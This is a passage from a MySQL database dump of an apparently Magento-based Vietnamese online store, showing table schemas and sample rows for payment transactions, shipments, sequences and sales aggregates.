roduct'),(27,27,140,1.1000,379500.0000,379500.0000,379500.0000,379500.0000,NULL,'product'),(28,28,141,1.1000,143000.0000,143000.0000,143000.0000,143000.0000,NULL,'product'),(29,29,142,1.1000,1069200.0000,1069200.0000,1069200.0000,1069200.0000,NULL,'product'),(30,30,143,1.1000,86625.0000,86625.0000,86625.0000,86625.0000,NULL,'product'),(31,31,144,1.1000,111100.0000,111100.0000,111100.0000,111100.0000,NULL,'product'),(32,32,146,1.1000,36300.0000,36300.0000,36300.0000,36300.0000,NULL,'product'),(33,33,148,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(34,34,149,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(35,35,150,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(36,36,151,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(37,37,152,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(38,38,153,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(39,39,154,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(40,40,155,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(41,41,156,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(42,42,157,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(43,43,158,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(44,44,159,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(45,45,160,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(46,46,161,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(47,47,162,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(48,48,163,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(49,49,164,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(50,50,165,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(51,51,166,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(52,52,167,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(53,53,168,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(54,54,169,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(55,55,170,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(56,56,171,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(57,57,172,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(58,58,173,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(59,59,174,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(60,60,175,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(61,61,176,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(62,62,177,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(63,63,178,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(64,63,179,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(65,64,180,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(66,64,181,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(67,65,182,1.1000,192500.0000,192500.0000,192500.0000,192500.0000,NULL,'product'),(68,65,183,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(69,66,184,1.1000,1925000.0000,1925000.0000,1925000.0000,1925000.0000,NULL,'product'),(70,67,185,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(71,68,186,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(72,68,187,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(73,68,188,1.1000,258500.0000,258500.0000,258500.0000,258500.0000,NULL,'product'),(74,69,189,1.1000,258500.0000,258500.0000,258500.0000,258500.0000,NULL,'product'),(75,70,190,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(76,70,191,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(77,71,192,1.1000,139700.0000,139700.0000,139700.0000,139700.0000,NULL,'product'),(78,71,193,1.1000,258500.0000,258500.0000,258500.0000,258500.0000,NULL,'product'),(79,72,194,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(80,73,197,1.1000,17710.0000,17710.0000,17710.0000,17710.0000,NULL,'product'),(81,74,198,1.1000,2200.0000,2200.0000,2200.0000,2200.0000,NULL,'product'),(82,75,199,1.1000,1100.0000,1100.0000,1100.0000,1100.0000,NULL,'product'),(83,76,200,1.1000,1100.0000,1100.0000,1100.0000,1100.0000,NULL,'product'),(84,77,201,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(85,77,202,1.1000,93500.0000,93500.0000,93500.0000,93500.0000,NULL,'product'),(86,78,208,1.1000,80410.0000,80410.0000,80410.0000,80410.0000,NULL,'product'),(87,79,209,1.1000,14190.0000,14190.0000,14190.0000,14190.0000,NULL,'product'),(88,80,211,1.1000,34210.0000,34210.0000,34210.0000,34210.0000,NULL,'product'),(89,81,212,1.1000,100320.0000,100320.0000,100320.0000,100320.0000,NULL,'product'),(90,82,213,1.1000,2200.0000,2200.0000,2200.0000,2200.0000,NULL,'product');

--
-- Table structure for table `sales_payment_transaction`
--

CREATE TABLE `sales_payment_transaction` (
  `transaction_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Transaction ID',
  `parent_id` int(10) unsigned DEFAULT NULL COMMENT 'Parent ID',
  `order_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Order ID',
  `payment_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Payment ID',
  `txn_id` varchar(100) DEFAULT NULL COMMENT 'Txn ID',
  `parent_txn_id` varchar(100) DEFAULT NULL COMMENT 'Parent Txn ID',
  `txn_type` varchar(15) DEFAULT NULL COMMENT 'Txn Type',
  `is_closed` smallint(5) unsigned NOT NULL DEFAULT 1 COMMENT 'Is Closed',
  `additional_information` blob DEFAULT NULL COMMENT 'Additional Information',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  PRIMARY KEY (`transaction_id`),
  UNIQUE KEY `SALES_PAYMENT_TRANSACTION_ORDER_ID_PAYMENT_ID_TXN_ID` (`order_id`,`payment_id`,`txn_id`),
  KEY `SALES_PAYMENT_TRANSACTION_PARENT_ID` (`parent_id`),
  KEY `SALES_PAYMENT_TRANSACTION_PAYMENT_ID` (`payment_id`),
  CONSTRAINT `FK_B99FF1A06402D725EBDB0F3A7ECD47A2` FOREIGN KEY (`parent_id`) REFERENCES `sales_payment_transaction` (`transaction_id`) ON DELETE CASCADE,
  CONSTRAINT `SALES_PAYMENT_TRANSACTION_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  CONSTRAINT `SALES_PAYMENT_TRANSACTION_PAYMENT_ID_SALES_ORDER_PAYMENT_ENTT_ID` FOREIGN KEY (`payment_id`) REFERENCES `sales_order_payment` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='Sales Payment Transaction';

--
-- Dumping data for table `sales_payment_transaction`
--

INSERT INTO `sales_payment_transaction` VALUES (1,NULL,221,221,'18960618629',NULL,'capture',0,'null','2021-12-08 09:37:15'),(2,NULL,222,222,'18960128242',NULL,'capture',0,'null','2021-12-08 09:45:27'),(3,NULL,223,223,'18960703159',NULL,'capture',0,'null','2021-12-08 09:57:29');

--
-- Table structure for table `sales_refunded_aggregated`
--

CREATE TABLE `sales_refunded_aggregated` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) NOT NULL COMMENT 'Order Status',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `refunded` decimal(20,4) DEFAULT NULL COMMENT 'Refunded',
  `online_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Online Refunded',
  `offline_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Offline Refunded',
  PRIMARY KEY (`id`),
  UNIQUE KEY `SALES_REFUNDED_AGGREGATED_PERIOD_STORE_ID_ORDER_STATUS` (`period`,`store_id`,`order_status`),
  KEY `SALES_REFUNDED_AGGREGATED_STORE_ID` (`store_id`),
  CONSTRAINT `SALES_REFUNDED_AGGREGATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Refunded Aggregated';

--
-- Dumping data for table `sales_refunded_aggregated`
--


--
-- Table structure for table `sales_refunded_aggregated_order`
--

CREATE TABLE `sales_refunded_aggregated_order` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `refunded` decimal(20,4) DEFAULT NULL COMMENT 'Refunded',
  `online_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Online Refunded',
  `offline_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Offline Refunded',
  PRIMARY KEY (`id`),
  UNIQUE KEY `SALES_REFUNDED_AGGREGATED_ORDER_PERIOD_STORE_ID_ORDER_STATUS` (`period`,`store_id`,`order_status`),
  KEY `SALES_REFUNDED_AGGREGATED_ORDER_STORE_ID` (`store_id`),
  CONSTRAINT `SALES_REFUNDED_AGGREGATED_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Refunded Aggregated Order';

--
-- Dumping data for table `sales_refunded_aggregated_order`
--


--
-- Table structure for table `sales_sequence_meta`
--

CREATE TABLE `sales_sequence_meta` (
  `meta_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `entity_type` varchar(32) NOT NULL COMMENT 'Prefix',
  `store_id` smallint(5) unsigned NOT NULL COMMENT 'Store ID',
  `sequence_table` varchar(64) NOT NULL COMMENT 'table for sequence',
  PRIMARY KEY (`meta_id`),
  UNIQUE KEY `SALES_SEQUENCE_META_ENTITY_TYPE_STORE_ID` (`entity_type`,`store_id`)
) ENGINE=InnoDB AUTO_INCREMENT=57 DEFAULT CHARSET=utf8 COMMENT='sales_sequence_meta';

--
-- Dumping data for table `sales_sequence_meta`
--

INSERT INTO `sales_sequence_meta` VALUES (1,'order',0,'sequence_order_0'),(2,'invoice',0,'sequence_invoice_0'),(3,'creditmemo',0,'sequence_creditmemo_0'),(4,'shipment',0,'sequence_shipment_0'),(37,'order',9,'sequence_order_9'),(38,'invoice',9,'sequence_invoice_9'),(39,'creditmemo',9,'sequence_creditmemo_9'),(40,'shipment',9,'sequence_shipment_9'),(53,'order',1,'sequence_order_1'),(54,'invoice',1,'sequence_invoice_1'),(55,'creditmemo',1,'sequence_creditmemo_1'),(56,'shipment',1,'sequence_shipment_1');

--
-- Table structure for table `sales_sequence_profile`
--

CREATE TABLE `sales_sequence_profile` (
  `profile_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `meta_id` int(10) unsigned NOT NULL COMMENT 'Meta_id',
  `prefix` varchar(32) DEFAULT NULL COMMENT 'Prefix',
  `suffix` varchar(32) DEFAULT NULL COMMENT 'Suffix',
  `start_value` int(10) unsigned NOT NULL DEFAULT 1 COMMENT 'Start value for sequence',
  `step` int(10) unsigned NOT NULL DEFAULT 1 COMMENT 'Step for sequence',
  `max_value` int(10) unsigned NOT NULL COMMENT 'MaxValue for sequence',
  `warning_value` int(10) unsigned NOT NULL COMMENT 'WarningValue for sequence',
  `is_active` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'isActive flag',
  PRIMARY KEY (`profile_id`),
  UNIQUE KEY `SALES_SEQUENCE_PROFILE_META_ID_PREFIX_SUFFIX` (`meta_id`,`prefix`,`suffix`),
  CONSTRAINT `SALES_SEQUENCE_PROFILE_META_ID_SALES_SEQUENCE_META_META_ID` FOREIGN KEY (`meta_id`) REFERENCES `sales_sequence_meta` (`meta_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=57 DEFAULT CHARSET=utf8 COMMENT='sales_sequence_profile';

--
-- Dumping data for table `sales_sequence_profile`
--

INSERT INTO `sales_sequence_profile` VALUES (1,1,NULL,NULL,1,1,4294967295,4294966295,1),(2,2,NULL,NULL,1,1,4294967295,4294966295,1),(3,3,NULL,NULL,1,1,4294967295,4294966295,1),(4,4,NULL,NULL,1,1,4294967295,4294966295,1),(37,37,'9',NULL,1,1,4294967295,4294966295,1),(38,38,'9',NULL,1,1,4294967295,4294966295,1),(39,39,'9',NULL,1,1,4294967295,4294966295,1),(40,40,'9',NULL,1,1,4294967295,4294966295,1),(53,53,NULL,NULL,1,1,4294967295,4294966295,1),(54,54,NULL,NULL,1,1,4294967295,4294966295,1),(55,55,NULL,NULL,1,1,4294967295,4294966295,1),(56,56,NULL,NULL,1,1,4294967295,4294966295,1);

--
-- Table structure for table `sales_shipment`
--

CREATE TABLE `sales_shipment` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `total_weight` decimal(12,4) DEFAULT NULL COMMENT 'Total Weight',
  `total_qty` decimal(12,4) DEFAULT NULL COMMENT 'Total Qty',
  `email_sent` smallint(5) unsigned DEFAULT NULL COMMENT 'Email Sent',
  `send_email` smallint(5) unsigned DEFAULT NULL COMMENT 'Send Email',
  `order_id` int(10) unsigned NOT NULL COMMENT 'Order ID',
  `customer_id` int(11) DEFAULT NULL COMMENT 'Customer ID',
  `shipping_address_id` int(11) DEFAULT NULL COMMENT 'Shipping Address ID',
  `billing_address_id` int(11) DEFAULT NULL COMMENT 'Billing Address ID',
  `shipment_status` int(11) DEFAULT NULL COMMENT 'Shipment Status',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `packages` text DEFAULT NULL COMMENT 'Packed Products in Packages',
  `shipping_label` mediumblob DEFAULT NULL COMMENT 'Shipping Label Content',
  `customer_note` text DEFAULT NULL COMMENT 'Customer Note',
  `customer_note_notify` smallint(5) unsigned DEFAULT NULL COMMENT 'Customer Note Notify',
  PRIMARY KEY (`entity_id`),
  UNIQUE KEY `SALES_SHIPMENT_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  KEY `SALES_SHIPMENT_STORE_ID` (`store_id`),
  KEY `SALES_SHIPMENT_TOTAL_QTY` (`total_qty`),
  KEY `SALES_SHIPMENT_ORDER_ID` (`order_id`),
  KEY `SALES_SHIPMENT_CREATED_AT` (`created_at`),
  KEY `SALES_SHIPMENT_UPDATED_AT` (`updated_at`),
  KEY `SALES_SHIPMENT_SEND_EMAIL` (`send_email`),
  KEY `SALES_SHIPMENT_EMAIL_SENT` (`email_sent`),
  CONSTRAINT `SALES_SHIPMENT_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  CONSTRAINT `SALES_SHIPMENT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment';

--
-- Dumping data for table `sales_shipment`
--

INSERT INTO `sales_shipment` VALUES (1,9,NULL,1.0000,NULL,NULL,34,8,67,68,NULL,'9000000001','2021-10-06 11:35:14','2021-10-06 11:35:14','[]',NULL,NULL,NULL);

--
-- Table structure for table `sales_shipment_comment`
--

CREATE TABLE `sales_shipment_comment` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `parent_id` int(10) unsigned NOT NULL COMMENT 'Parent ID',
  `is_customer_notified` int(11) DEFAULT NULL COMMENT 'Is Customer Notified',
  `is_visible_on_front` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Is Visible On Front',
  `comment` text DEFAULT NULL COMMENT 'Comment',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  PRIMARY KEY (`entity_id`),
  KEY `SALES_SHIPMENT_COMMENT_CREATED_AT` (`created_at`),
  KEY `SALES_SHIPMENT_COMMENT_PARENT_ID` (`parent_id`),
  CONSTRAINT `SALES_SHIPMENT_COMMENT_PARENT_ID_SALES_SHIPMENT_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_shipment` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment Comment';

--
-- Dumping data for table `sales_shipment_comment`
--


--
-- Table structure for table `sales_shipment_grid`
--

CREATE TABLE `sales_shipment_grid` (
  `entity_id` int(10) unsigned NOT NULL COMMENT 'Entity ID',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_increment_id` varchar(32) NOT NULL COMMENT 'Order Increment ID',
  `order_id` int(10) unsigned NOT NULL COMMENT 'Order ID',
  `order_created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Order Increment ID',
  `customer_name` varchar(128) NOT NULL COMMENT 'Customer Name',
  `total_qty` decimal(12,4) DEFAULT NULL COMMENT 'Total Qty',
  `shipment_status` int(11) DEFAULT NULL COMMENT 'Shipment Status',
  `order_status` varchar(32) DEFAULT NULL COMMENT 'Order',
  `billing_address` varchar(255) DEFAULT NULL COMMENT 'Billing Address',
  `shipping_address` varchar(255) DEFAULT NULL COMMENT 'Shipping Address',
  `billing_name` varchar(128) DEFAULT NULL COMMENT 'Billing Name',
  `shipping_name` varchar(128) DEFAULT NULL COMMENT 'Shipping Name',
  `customer_email` varchar(128) DEFAULT NULL COMMENT 'Customer Email',
  `customer_group_id` int(11) DEFAULT NULL,
  `payment_method` varchar(32) DEFAULT NULL COMMENT 'Payment Method',
  `shipping_information` varchar(255) DEFAULT NULL COMMENT 'Shipping Method Name',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At',
  PRIMARY KEY (`entity_id`),
  UNIQUE KEY `SALES_SHIPMENT_GRID_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  KEY `SALES_SHIPMENT_GRID_STORE_ID` (`store_id`),
  KEY `SALES_SHIPMENT_GRID_TOTAL_QTY` (`total_qty`),
  KEY `SALES_SHIPMENT_GRID_ORDER_INCREMENT_ID` (`order_increment_id`),
  KEY `SALES_SHIPMENT_GRID_SHIPMENT_STATUS` (`shipment_status`),
  KEY `SALES_SHIPMENT_GRID_ORDER_STATUS` (`order_status`),
  KEY `SALES_SHIPMENT_GRID_CREATED_AT` (`created_at`),
  KEY `SALES_SHIPMENT_GRID_UPDATED_AT` (`updated_at`),
  KEY `SALES_SHIPMENT_GRID_ORDER_CREATED_AT` (`order_created_at`),
  KEY `SALES_SHIPMENT_GRID_SHIPPING_NAME` (`shipping_name`),
  KEY `SALES_SHIPMENT_GRID_BILLING_NAME` (`billing_name`),
  KEY `SALES_SHIPMENT_GRID_ORDER_ID` (`order_id`),
  FULLTEXT KEY `FTI_086B40C8955F167B8EA76653437879B4` (`increment_id`,`order_increment_id`,`shipping_name`,`customer_name`,`customer_email`,`billing_address`,`shipping_address`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment Grid';

--
-- Dumping data for table `sales_shipment_grid`
--

INSERT INTO `sales_shipment_grid` VALUES (1,'9000000001',9,'9000000020',34,'2021-10-06 11:33:46','Netbase JSC JSC',1.0000,NULL,'complete','Netbase Jsc,91 nguyen chi thanh,Hanoi,Cong,10000','Netbase Jsc,91 nguyen chi thanh,Hanoi,Cong,10000','Netbase JSC','Netbase JSC','netbaseteam2@gmail.com',4,'vnpay','Miễn phí giao hàng - Miễn phí','2021-10-06 11:35:14','2021-10-06 11:35:14');

--
-- Table structure for table `sales_shipment_item`
--

CREATE TABLE `sales_shipment_item` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `parent_id` int(10) unsigned NOT NULL COMMENT 'Parent ID',
  `row_total` decimal(20,4) DEFAULT NULL COMMENT 'Row Total',
  `price` decimal(20,4) DEFAULT NULL COMMENT 'Price',
  `weight` decimal(12,4) DEFAULT NULL COMMENT 'Weight',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `product_id` int(11) DEFAULT NULL COMMENT 'Product ID',
  `order_item_id` int(11) DEFAULT NULL COMMENT 'Order Item ID',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `description` text DEFAULT NULL COMMENT 'Description',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `sku` varchar(255) DEFAULT NULL COMMENT 'Sku',
  PRIMARY KEY (`entity_id`),
  KEY `SALES_SHIPMENT_ITEM_PARENT_ID` (`parent_id`),
  CONSTRAINT `SALES_SHIPMENT_ITEM_PARENT_ID_SALES_SHIPMENT_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_shipment` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment Item';

--
-- Dumping data for table `sales_shipment_item`
--

INSERT INTO `sales_shipment_item` VALUES (1,1,NULL,9097000.0000,0.0000,1.0000,73,40,NULL,NULL,'Kệ tivi Brooklyn','CH01-SP30');

--
-- Table structure for table `sales_shipment_track`
--

CREATE TABLE `sales_shipment_track` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `parent_id` int(10) unsigned NOT NULL COMMENT 'Parent ID',
  `weight` decimal(12,4) DEFAULT NULL COMMENT 'Weight',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `order_id` int(10) unsigned NOT NULL COMMENT 'Order ID',
  `track_number` text DEFAULT NULL COMMENT 'Number',
  `description` text DEFAULT NULL COMMENT 'Description',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `carrier_code` varchar(32) DEFAULT NULL COMMENT 'Carrier Code',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  PRIMARY KEY (`entity_id`),
  KEY `SALES_SHIPMENT_TRACK_PARENT_ID` (`parent_id`),
  KEY `SALES_SHIPMENT_TRACK_ORDER_ID` (`order_id`),
  KEY `SALES_SHIPMENT_TRACK_CREATED_AT` (`created_at`),
  CONSTRAINT `SALES_SHIPMENT_TRACK_PARENT_ID_SALES_SHIPMENT_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_shipment` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment Track';

--
-- Dumping data for table `sales_shipment_track`
--


--
-- Table structure for table `sales_shipping_aggregated`
--

CREATE TABLE `sales_shipping_aggregated` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `shipping_description` varchar(255) DEFAULT NULL COMMENT 'Shipping Description',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `total_shipping` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping',
  `total_shipping_actual` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping Actual',
  PRIMARY KEY (`id`),
  UNIQUE KEY `SALES_SHPP_AGGRED_PERIOD_STORE_ID_ORDER_STS_SHPP_DESCRIPTION` (`period`,`store_id`,`order_status`,`shipping_description`),
  KEY `SALES_SHIPPING_AGGREGATED_STORE_ID` (`store_id`),
  CONSTRAINT `SALES_SHIPPING_AGGREGATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL
) ENGINE=InnoDB AUTO_INCREMENT=49 DEFAULT CHARSET=utf8 COMMENT='Sales Shipping Aggregated';

--
-- Dumping data for table `sales_shipping_aggregated`
--

INSERT INTO `sales_shipping_aggregated` VALUES (16,'2021-10-07',9,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(17,'2021-10-07',9,'processing','Miễn phí giao hàng - Miễn phí',3,0.0000,0.0000),(23,'2021-10-07',0,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(24,'2021-10-07',0,'processing','Miễn phí giao hàng - Miễn phí',3,0.0000,0.0000),(27,'2021-10-11',9,'processing','Miễn phí giao hàng - Miễn phí',2,0.0000,0.0000),(28,'2021-10-11',0,'processing','Miễn phí giao hàng - Miễn phí',2,0.0000,0.0000),(33,'2021-10-06',9,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(34,'2021-10-06',9,'holded','Miễn phí giao hàng - Miễn phí',4,0.0000,0.0000),(35,'2021-10-06',9,'processing','Miễn phí giao hàng - Miễn phí',7,0.0000,0.0000),(36,'2021-10-06',9,'shipment','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(37,'2021-10-18',9,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(40,'2021-10-06',0,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(41,'2021-10-06',0,'holded','Miễn phí giao hàng - Miễn phí',4,0.0000,0.0000),(42,'2021-10-06',0,'processing','Miễn phí giao hàng - Miễn phí',7,0.0000,0.0000),(43,'2021-10-06',0,'shipment','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(44,'2021-10-18',0,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(47,'2021-12-08',9,'processing','Miễn phí giao hàng - Miễn phí',3,0.0000,0.0000),(48,'2021-12-08',0,'processing','Miễn phí giao hàng - Miễn phí',3,0.0000,0.0000);

--
-- Table structure for table `sales_shipping_aggregated_order`
--

CREATE TABLE `sales_shipping_aggregated_order` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `shipping_description` varchar(255) DEFAULT NULL COMMENT 'Shipping Description',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `total_shipping` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping',
  `total_shipping_actual` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping Actual',
  PRIMARY KEY (`id`),
  UNIQUE KEY `UNQ_C05FAE47282EEA68654D0924E946761F` (`period`,`store_id`,`order_status`,`shipping_description`),
  KEY `SALES_SHIPPING_AGGREGATED_ORDER_STORE_ID` (`store_id`),
  CONSTRAINT `SALES_SHIPPING_AGGREGATED_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL
) ENGINE=InnoDB AUTO_INCREMENT=155 DEFAULT CHARSET=utf8 COMMENT='Sales Shipping Aggregated Order';

--
-- Dumping data for table `sales_shipping_aggregated_order`
--

INSERT INTO `sales_shipping_aggregated_order` VALUES (29,'2021-06-05',NULL,'canceled','Free Shipping - Free',1,0.0000,NULL),(30,'2021-06-08',NULL,'canceled','Free Shipping - Free',9,0.0000,NULL),(31,'2021-06-09',NULL,'canceled','Free Shipping - Free',3,0.0000,NULL),(32,'2021-06-10',NULL,'canceled','Free Shipping - Free',1,0.0000,NULL),(33,'2021-08-31',9,'canceled','Free Shipping - Free',1,0.0000,NULL),(34,'2021-09-28',9,'canceled','Free Shipping - Free',2,0.0000,NULL),(44,'2021-08-31',0,'canceled','Free Shipping - Free',1,0.0000,NULL),(45,'2021-09-28',0,'canceled','Free Shipping - Free',2,0.0000,NULL),(69,'2021-11-16',9,'canceled','Miễn phí giao hàng - Miễn phí',17,0.0000,NULL),(70,'2021-11-16',9,'canceled','Tỷ lệ cố định - Cố định',9,0.0000,NULL),(72,'2021-11-16',0,'canceled','Miễn phí giao hàng - Miễn phí',17,0.0000,NULL),(73,'2021-11-16',0,'canceled','Tỷ lệ cố định - Cố 